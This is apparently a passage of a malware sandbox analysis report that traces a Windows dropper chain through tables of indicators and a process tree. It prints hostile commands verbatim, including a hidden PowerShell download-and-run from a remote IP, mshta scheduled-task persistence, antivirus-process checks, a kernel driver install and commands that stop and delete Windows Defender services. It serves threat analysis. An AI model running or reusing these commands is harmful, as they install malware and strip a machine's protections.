1376	df504a29ad522d6eabe6258886d296bc.exe
4448	rapes.exe
4448	rapes.exe
4468	79cfa38bf5.exe
4468	79cfa38bf5.exe
4468	79cfa38bf5.exe
4468	79cfa38bf5.exe
4468	79cfa38bf5.exe
4468	79cfa38bf5.exe
652	Exam.com
652	Exam.com
652	Exam.com
652	Exam.com
652	Exam.com
652	Exam.com
1608	BIm18E9.exe
1608	BIm18E9.exe
3592	rapes.exe
3592	rapes.exe
1088	msiexec.exe
1088	msiexec.exe
4752	powershell.exe
4752	powershell.exe
4752	powershell.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
5652	powershell.exe
5652	powershell.exe
3076	Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE
3076	Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE
5652	powershell.exe
2268	powershell.exe
2268	powershell.exe
2268	powershell.exe
652	Exam.com
652	Exam.com
652	Exam.com
652	Exam.com
6024	svchost.exe
6024	svchost.exe
6024	svchost.exe
6024	svchost.exe
1476	powershell.exe
1476	powershell.exe
1476	powershell.exe
2912	powershell.exe
2912	powershell.exe
2912	powershell.exe
2768	483d2fa8a0d53818306efeb32d3.exe
2768	483d2fa8a0d53818306efeb32d3.exe
2380	Exam.com
2380	Exam.com
2380	Exam.com
2380	Exam.com
2380	Exam.com
2380	Exam.com
4348	785956b81d.exe
4348	785956b81d.exe
1956	da26fd5ce6.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5216	f73ae_003.exe
5216	f73ae_003.exe
5216	f73ae_003.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	6096	tasklist.exe
Token: SeDebugPrivilege	2276	tasklist.exe
Token: SeDebugPrivilege	5372	tool.exe
Token: SeShutdownPrivilege	6024	msiexec.exe
Token: SeIncreaseQuotaPrivilege	6024	msiexec.exe
Token: SeSecurityPrivilege	1088	msiexec.exe
Token: SeCreateTokenPrivilege	6024	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	6024	msiexec.exe
Token: SeLockMemoryPrivilege	6024	msiexec.exe
Token: SeIncreaseQuotaPrivilege	6024	msiexec.exe
Token: SeMachineAccountPrivilege	6024	msiexec.exe
Token: SeTcbPrivilege	6024	msiexec.exe
Token: SeSecurityPrivilege	6024	msiexec.exe
Token: SeTakeOwnershipPrivilege	6024	msiexec.exe
Token: SeLoadDriverPrivilege	6024	msiexec.exe
Token: SeSystemProfilePrivilege	6024	msiexec.exe
Token: SeSystemtimePrivilege	6024	msiexec.exe
Token: SeProfSingleProcessPrivilege	6024	msiexec.exe
Token: SeIncBasePriorityPrivilege	6024	msiexec.exe
Token: SeCreatePagefilePrivilege	6024	msiexec.exe
Token: SeCreatePermanentPrivilege	6024	msiexec.exe
Token: SeBackupPrivilege	6024	msiexec.exe
Token: SeRestorePrivilege	6024	msiexec.exe
Token: SeShutdownPrivilege	6024	msiexec.exe
Token: SeDebugPrivilege	6024	msiexec.exe
Token: SeAuditPrivilege	6024	msiexec.exe
Token: SeSystemEnvironmentPrivilege	6024	msiexec.exe
Token: SeChangeNotifyPrivilege	6024	msiexec.exe
Token: SeRemoteShutdownPrivilege	6024	msiexec.exe
Token: SeUndockPrivilege	6024	msiexec.exe
Token: SeSyncAgentPrivilege	6024	msiexec.exe
Token: SeEnableDelegationPrivilege	6024	msiexec.exe
Token: SeManageVolumePrivilege	6024	msiexec.exe
Token: SeImpersonatePrivilege	6024	msiexec.exe
Token: SeCreateGlobalPrivilege	6024	msiexec.exe
Token: SeCreateTokenPrivilege	6024	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	6024	msiexec.exe
Token: SeLockMemoryPrivilege	6024	msiexec.exe
Token: SeIncreaseQuotaPrivilege	6024	msiexec.exe
Token: SeMachineAccountPrivilege	6024	msiexec.exe
Token: SeTcbPrivilege	6024	msiexec.exe
Token: SeSecurityPrivilege	6024	msiexec.exe
Token: SeTakeOwnershipPrivilege	6024	msiexec.exe
Token: SeLoadDriverPrivilege	6024	msiexec.exe
Token: SeSystemProfilePrivilege	6024	msiexec.exe
Token: SeSystemtimePrivilege	6024	msiexec.exe
Token: SeProfSingleProcessPrivilege	6024	msiexec.exe
Token: SeIncBasePriorityPrivilege	6024	msiexec.exe
Token: SeCreatePagefilePrivilege	6024	msiexec.exe
Token: SeCreatePermanentPrivilege	6024	msiexec.exe
Token: SeBackupPrivilege	6024	msiexec.exe
Token: SeRestorePrivilege	6024	msiexec.exe
Token: SeShutdownPrivilege	6024	msiexec.exe
Token: SeDebugPrivilege	6024	msiexec.exe
Token: SeAuditPrivilege	6024	msiexec.exe
Token: SeSystemEnvironmentPrivilege	6024	msiexec.exe
Token: SeChangeNotifyPrivilege	6024	msiexec.exe
Token: SeRemoteShutdownPrivilege	6024	msiexec.exe
Token: SeUndockPrivilege	6024	msiexec.exe
Token: SeSyncAgentPrivilege	6024	msiexec.exe
Token: SeEnableDelegationPrivilege	6024	msiexec.exe
Token: SeManageVolumePrivilege	6024	msiexec.exe
Token: SeImpersonatePrivilege	6024	msiexec.exe
Token: SeCreateGlobalPrivilege	6024	msiexec.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
652	Exam.com
652	Exam.com
652	Exam.com
6024	msiexec.exe
996	7d1dcbe9af.exe
996	7d1dcbe9af.exe
996	7d1dcbe9af.exe
6024	msiexec.exe
2380	Exam.com
2380	Exam.com
2380	Exam.com
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
6824	chrome.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
9528	firefox.exe
7924	65f4920f26.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
652	Exam.com
652	Exam.com
652	Exam.com
996	7d1dcbe9af.exe
996	7d1dcbe9af.exe
996	7d1dcbe9af.exe
2380	Exam.com
2380	Exam.com
2380	Exam.com
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe
7924	65f4920f26.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
9528	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1376 wrote to memory of 4448	1376	df504a29ad522d6eabe6258886d296bc.exe	88
PID 1376 wrote to memory of 4448	1376	df504a29ad522d6eabe6258886d296bc.exe	88
PID 1376 wrote to memory of 4448	1376	df504a29ad522d6eabe6258886d296bc.exe	88
PID 4448 wrote to memory of 3100	4448	rapes.exe	94
PID 4448 wrote to memory of 3100	4448	rapes.exe	94
PID 4448 wrote to memory of 3100	4448	rapes.exe	94
PID 3100 wrote to memory of 4600	3100	TbV75ZR.exe	95
PID 3100 wrote to memory of 4600	3100	TbV75ZR.exe	95
PID 3100 wrote to memory of 4600	3100	TbV75ZR.exe	95
PID 4448 wrote to memory of 4468	4448	rapes.exe	99
PID 4448 wrote to memory of 4468	4448	rapes.exe	99
PID 4448 wrote to memory of 4468	4448	rapes.exe	99
PID 4600 wrote to memory of 6096	4600	CMD.exe	100
PID 4600 wrote to memory of 6096	4600	CMD.exe	100
PID 4600 wrote to memory of 6096	4600	CMD.exe	100
PID 4600 wrote to memory of 636	4600	CMD.exe	101
PID 4600 wrote to memory of 636	4600	CMD.exe	101
PID 4600 wrote to memory of 636	4600	CMD.exe	101
PID 4600 wrote to memory of 2276	4600	CMD.exe	102
PID 4600 wrote to memory of 2276	4600	CMD.exe	102
PID 4600 wrote to memory of 2276	4600	CMD.exe	102
PID 4600 wrote to memory of 1388	4600	CMD.exe	103
PID 4600 wrote to memory of 1388	4600	CMD.exe	103
PID 4600 wrote to memory of 1388	4600	CMD.exe	103
PID 4600 wrote to memory of 372	4600	CMD.exe	104
PID 4600 wrote to memory of 372	4600	CMD.exe	104
PID 4600 wrote to memory of 372	4600	CMD.exe	104
PID 4600 wrote to memory of 2692	4600	CMD.exe	105
PID 4600 wrote to memory of 2692	4600	CMD.exe	105
PID 4600 wrote to memory of 2692	4600	CMD.exe	105
PID 4600 wrote to memory of 2572	4600	CMD.exe	106
PID 4600 wrote to memory of 2572	4600	CMD.exe	106
PID 4600 wrote to memory of 2572	4600	CMD.exe	106
PID 4600 wrote to memory of 1540	4600	CMD.exe	107
PID 4600 wrote to memory of 1540	4600	CMD.exe	107
PID 4600 wrote to memory of 1540	4600	CMD.exe	107
PID 4600 wrote to memory of 5504	4600	CMD.exe	108
PID 4600 wrote to memory of 5504	4600	CMD.exe	108
PID 4600 wrote to memory of 5504	4600	CMD.exe	108
PID 4600 wrote to memory of 652	4600	CMD.exe	109
PID 4600 wrote to memory of 652	4600	CMD.exe	109
PID 4600 wrote to memory of 652	4600	CMD.exe	109
PID 4600 wrote to memory of 3944	4600	CMD.exe	110
PID 4600 wrote to memory of 3944	4600	CMD.exe	110
PID 4600 wrote to memory of 3944	4600	CMD.exe	110
PID 4448 wrote to memory of 5372	4448	rapes.exe	111
PID 4448 wrote to memory of 5372	4448	rapes.exe	111
PID 4448 wrote to memory of 5372	4448	rapes.exe	111
PID 5372 wrote to memory of 6024	5372	tool.exe	112
PID 5372 wrote to memory of 6024	5372	tool.exe	112
PID 5372 wrote to memory of 6024	5372	tool.exe	112
PID 1088 wrote to memory of 3116	1088	msiexec.exe	115
PID 1088 wrote to memory of 3116	1088	msiexec.exe	115
PID 1088 wrote to memory of 3116	1088	msiexec.exe	115
PID 3116 wrote to memory of 4808	3116	MsiExec.exe	116
PID 3116 wrote to memory of 4808	3116	MsiExec.exe	116
PID 3116 wrote to memory of 4808	3116	MsiExec.exe	116
PID 4448 wrote to memory of 2280	4448	rapes.exe	119
PID 4448 wrote to memory of 2280	4448	rapes.exe	119
PID 4448 wrote to memory of 2280	4448	rapes.exe	119
PID 2280 wrote to memory of 5760	2280	WLbfHbp.exe	120
PID 2280 wrote to memory of 5760	2280	WLbfHbp.exe	120
PID 2280 wrote to memory of 5760	2280	WLbfHbp.exe	120
PID 4448 wrote to memory of 1608	4448	rapes.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2968
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6024
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:724

C:\Users\Admin\AppData\Local\Temp\df504a29ad522d6eabe6258886d296bc.exe
"C:\Users\Admin\AppData\Local\Temp\df504a29ad522d6eabe6258886d296bc.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1376
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3100
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4600
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6096
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:636
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1388
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        5⤵
        
        PID:372
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2692
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2572
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        5⤵
        
        PID:1540
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5504
    - - C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:652
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 900
        6⤵
        Program crash
        
        PID:2564
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3944
- - C:\Users\Admin\AppData\Local\Temp\10340260101\79cfa38bf5.exe
    "C:\Users\Admin\AppData\Local\Temp\10340260101\79cfa38bf5.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4468
- - C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe
    "C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5372
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
      4⤵
      Enumerates connected drives
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:6024
- - C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe
    "C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2280
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:5760
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:4488
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5608
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:6116
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4052
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3068
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        5⤵
        
        PID:3688
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        5⤵
        
        PID:4472
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4224
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5816
    - - C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2380
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 888
        6⤵
        Program crash
        
        PID:2644
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4788
- - C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe
    "C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1608
- - C:\Users\Admin\AppData\Local\Temp\10341150101\7d1dcbe9af.exe
    "C:\Users\Admin\AppData\Local\Temp\10341150101\7d1dcbe9af.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn zcQLomaLa9x /tr "mshta C:\Users\Admin\AppData\Local\Temp\tzwXyTX1D.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1428
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn zcQLomaLa9x /tr "mshta C:\Users\Admin\AppData\Local\Temp\tzwXyTX1D.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:552
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\tzwXyTX1D.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:220
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Suspicious behavior: EnumeratesProcesses
        
        PID:4752
      - C:\Users\Admin\AppData\Local\Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE
        
        "C:\Users\Admin\AppData\Local\Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:3076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10341160121\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2400
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 2
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:4668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
      4⤵
      PID:4348
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5652
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6140
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
      4⤵
      PID:5392
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1476
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "2KmsbmavyHX" /tr "mshta \"C:\Temp\ZJQwVjWeC.hta\"" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1628
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "C:\Temp\ZJQwVjWeC.hta"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:1288
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2912
      - C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2768
- - C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe
    "C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2380
  - - C:\Users\Admin\AppData\Local\Temp\11.exe
      "C:\Users\Admin\AppData\Local\Temp\11.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2640
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\175B.tmp\175C.tmp\175D.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        5⤵
        
        PID:3536
      - C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3496
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1875.tmp\1876.tmp\1877.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        7⤵
        Drops file in Program Files directory
        
        PID:5960
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:5212
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:3308
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:2820
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:460
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:5460
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1816
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5184
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:760
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:220
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:3748
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:6036
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:3020
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:4224
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:3612
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:3648
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:5484
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:2644
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:640
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:5512
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:5436
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:1892
        
